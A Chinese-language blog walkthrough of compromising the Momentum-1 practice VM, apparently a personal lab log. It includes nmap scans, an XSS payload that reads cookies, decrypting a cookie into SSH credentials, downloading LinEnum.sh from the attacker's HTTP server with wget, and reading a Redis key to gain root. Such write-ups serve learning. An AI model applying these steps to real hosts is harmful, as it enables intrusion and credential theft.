记录一次vuln靶场的渗透过程---Momentum-1
记录靶场练习
文章目录
目录
一、主机发现
二、漏洞发现
三、漏洞利用
四、权限提升
总结
一、主机发现
首先按照惯例,利用nmap进行主机发现,顺便将开放端口也扫描出来。扫描自己主机所在的网段。
nmap 192.168.216.0/24
可以看到IP地址和开放了22和80端口,接下来对服务器信息进行详细的扫描
nmap -A -v -T4 192.168.216.143
网站是使用Apache中间件搭建的,服务器是Debian
二、漏洞发现
访问80端口,看起来并没有特别的地方,只是一个图片展示的网站。
接下来对这个网站进行目录结构扫描,看看是否能扫出有用的文件
依次访问查看是否能够得到有用的信息,访问后img目录和css目录页都是正常的,但是在查看js目录后,发现了一段代码,不知道什么意思。
于是网上查找,就是在url后加上这一段就会跳转到另一个页面,试着尝试访问了一下。
发现无论在id下输入什么字符,都会显示出来,怀疑有xss漏洞,接着上poc
http://192.168.216.143/opus-details.php?id=%3Cscript%3Ealert(%221%22)%3C/script%3E
nice!果然存在漏洞。
三、漏洞利用
利用该漏洞尝试获取cookie信息
id=<script>alert(document.cookie)</script>
很明显这是一个加密后的值,具体是什么加密还不清楚。到这里发现
在这里有我们之前忽略掉的一段代码,可能是利用了“SecretPassphraseMomentum”对cookie信息进行了AES解密,在网上寻找在线解密网站解密后为“auxerre-alienum##”,而且想到服务器还开启了22端口,所以猜想这是一个账号和密码的组合
尝试了几个组合后,才登录了进去
auxerre alienum
alienum auxerre
auxerre alienum##
alienum## auxerre
auxerre auxerre-alienum
alienum auxerre-alienum
正确:auxerre auxerre-alienum##
附上参考网站:AES加密-AES解密-在线AES加密解密工具 (jsons.cn)
其实完全可以编写一个脚本进行测试,这样就不用一个个的去尝试,效率更高。
使用kali连接到服务器
ssh auxerre@192.168.216.143
第一个flag拿到
后续还需进行提权操作。
四、权限提升
在攻击机搭建一个http服务
python3 -m http.server 8001
在靶机下载LinEnum.sh
wget http://192.168.216.128:8001/LinEnum.sh
bash运行脚本收集系统信息保存到1.txt文件
有一个6379端口被监听,而且6379是Redis的默认端口,查看端口占用信息
Redis 服务因配置不当,可被攻击者恶意利用。黑客借助 Redis 内置命令,可将现有数据恶意清空;如果 Redis 以 root 身份运行,黑客可往服务器上写入 SSH 公钥文件,直接登录服务器。
所以连接上数据库尝试提权
查看redis服务下的键,发现有“rootpass”,怀疑是root密码,而且联系上上面“auxerre-alienum##”的关系,猜测"m0mentum-al1enum##"就是root的密码。
成功提权到root,拿到最后一个flag!
撒花!!!
总结
XSS漏洞
AES加密
枚举
LinEnum脚本收集服务器信息
Redis服务6379端口,查看所有key--keys *
记录一次vuln靶场的渗透过程---Momentum-1相关推荐
- 记录一次vuln靶场的渗透过程---driftingblues9
记录一次渗透的过程 目录 一.信息收集 二.发现漏洞 三.权限提升 总结 一.信息收集 1.使用nmap扫描网段,发现存活主机,以及开放的端口 nmap -v 192.168.216.0/24 192 ...
- 全!CTF靶场、渗透实战靶场总结 (适合收藏)
CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...
- 记某hw中遇到的cms(PageAdmin CMS)渗透过程
0x00前言 这是上周hw中遇到的一个cms,记录一下,防止以后遇到忘记利用点(手动狗头) 0x01介绍 PageAdmin Cms是一款基于asp.net mvc开发的自助建站系统,于2008年发布 ...
- kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
渗透过程中可能要用到的Kali工具小总结 写在最前面 最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的 所以写一个渗透过程中可能用到的kali渗透工具的小小总结 写的不对 多多包涵 各 ...
- 语言都是相通的,学好一门语言,再学第二门语言就很简单,记录一下我复习c语言的过程。...
语言都是相通的,学好一门语言,再学第二门语言就很简单,记录一下我复习c语言的过程. 为了将本人的python培训提高一个层次,本人最近买了很多算法的书. 这个书上的代码基本都是c语言实现的,c语言很久 ...
- oracle 9i 手工建库,简单记录Oracle 9i数据库手工建库过程
简单记录Oracle 9i数据库手工建库过程Oracle 9i手工建库 By Oracle老菜 今天客户要用oracle 9.2.0.5,aix 6.1已经不支持了,只好从别的数据库把软件拷贝过来重编 ...
- php网站渗透实战_【案例分析】记一次综合靶场实战渗透
原标题:[案例分析]记一次综合靶场实战渗透 时间有点久,这里主要和大家分享一下思路. 该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网. 开始渗透 首先进入靶场开放的唯一一个 ...
- 记录第一次使用nvidia tao训练模型的过程
记录第一次使用nvidia tao训练模型的过程 搭建NVIDIA TAO环境 编辑~/.tao_mounts.json,将自己的项目目录映射到docker中的目录 Nvidia TAO是NVIDIA ...
- 渗透过程中日志信息分析示例
渗透过程中,我们可能用普通账号进到了系统,在提权或者进一步信息收集的过程中,我们会获得一些日志文件,根据这些日志文件我们需要进一步的分析. 下面是kali官方给的日志文件,根据这个日志,讲述一下信息收 ...
最新文章
- Greenplum 2000亿 近似度查询 性能 以及注意事项
- 矩阵在计算机程序中的应用
- (转)TinyXML Tutorial 中文指南
- C++字符串操作函数
- STM32、Cortex-M3和ARMv8-M之间的关联
- 使用Azure Blob存储托管Maven工件
- 真服了!java翻译器软件下载手机版
- 【图文+代码】不客气的说,这可能是你距离深入理解Java接口最近的一次
- 【总结】Unity游戏优化
- OpenCV-图像处理(23、直方图均衡化)
- 上海理工大学HVAC综合实验室(图)
- ACM入门-最小生成树及其应用
- 使用跨端解决方案Rax编写鸿蒙应用
- 线性MMSE检波和ZF检波
- python编写poc_POC编写基础知识
- python圆形螺旋线_Python Turtle绘制漂亮彩色螺旋线及一闪而过的解决
- 第十五周项目二----用哈希法组织关键字之链地址法
- 蓝牙耳机哪个品牌经济实惠?价格便宜音质好的蓝牙耳机推荐
- 中国跨境平台出海,产业带依然是最大优势
- html设置自动切图指定位置,HTML5自助切图